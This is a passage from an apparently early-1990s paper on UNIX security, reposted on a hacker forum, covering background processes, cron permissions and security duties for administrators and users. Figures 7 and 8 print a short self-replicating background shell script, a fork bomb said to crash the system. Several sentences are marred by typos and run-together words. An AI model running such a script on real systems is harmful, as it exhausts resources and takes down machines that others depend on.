operation character &, and enables the user to give background commands. In UNIX system, a user can set up as many background processes as he like, up to the maximum defined by the system kernel. But even the number is far less then the maximum, the system functions may also be damaged. It is regretful that ps commands of manyUNIX versions can boot exactly mirror the status of background processes. Fig. 7 shows a very simple shell program:% cat call-selfcall-self% call-self &Figure 7. a very simple shell program(1)Once being run with background command, the program will createever-increasing processes until the system crashed. Even root can not stop it with kill command. What the situation will be if the program is being run according to Fig.8 ?% cat call-selfcall-self &% call-self &Figure 8. a very simple shell program(2)3) Job schedulingIn order to enable mutiprocess to visit the computer's CPU fairly,the time assigning department of the operation system should switch over to another process after a process used up its share of CPU source. UNIX provides timing and scheduling tools, such as at and batch command. Ifa privileged user setup privileges incorrectly of the list files at.allowand at.deny under /usr/lib/cron, unprivileged users may will cause great damage to the system.Besides, many game programs create some temporary files. Some virus and invaders can invade through these files. Therefore, we should keep alert to games.III. SECURITY MEASURESEfforts in different aspects are necessary to protect the system.Firstly, designers of the system should continually strengthen the security of the operation system, enhance security checkup, and provide safer versions of the system as well as more security checking tools. Secondly, both system managers and users should make clear their own responsibilities and ensure the security of the system jointly.1. System managerThe system manager has the important responsibility to keep the systemrunning safely and should manage the system carefully:1) Setup correct system files and privileges to visit the system directory.2) Chose root password and change them peroidly, make sure which rootuser has what privileges and prevent illegal users applying accounts.3) Frequently examine sulog file, search for traces of possible invaders.4) Examine the content of file /usr/lib/crontab to prevent anyone todamage the file system on purpose or plant Trojan horse.5) Make sure each user loads his own file system.6) As for network environment,. prevent revealing o information;. prevent analyzing of communicating amount;. check any motify of information sources;. check any facility error;. check any falsely claimed request to link2. UserIn order to ensure the security of his information, each user shouldcorrectly make full use ofsecurity mechanism:1) Chose suitable passwods,keep them safely and chang them periodly.2) Set up.profile, umask and make a backup.3) Encrypt importent text and make a backup.4) Reset the terminnal bemodifyingogin into the the system to preventbeing chealed.5) Make sure that you have logouted the system whe you leave the terminal. REFERENCE:[1] Stephen Cffin, UNIX The Complete Reference, Mcgraw-Hill Co.,1991[2] Ai R.Y., Security of Computer Operation System, China Computerword No.67, Mar, 4, 1992[3] Zhu L.H., On UNIX Security, China Computerworld, No.73, Dec,5,1990[4] Zhou Sh.d., An Loophole of UNIX and Its Analysis,Electric Brain Application Times, N.1, 1992[5] Guo W.J., Several Encrypt Measures of UNIX Files, China Computerworld, No.77, Dec,5, 1990[6] SUN Microsystems, SunOS Reference Manual, 1991[7] Hu X.M. etc, UNIX Structural Analysis, Zhejiang University Press,Feb,1991本文来自:★Yes黑客联盟技术论坛★/read.php?tid-3612.html。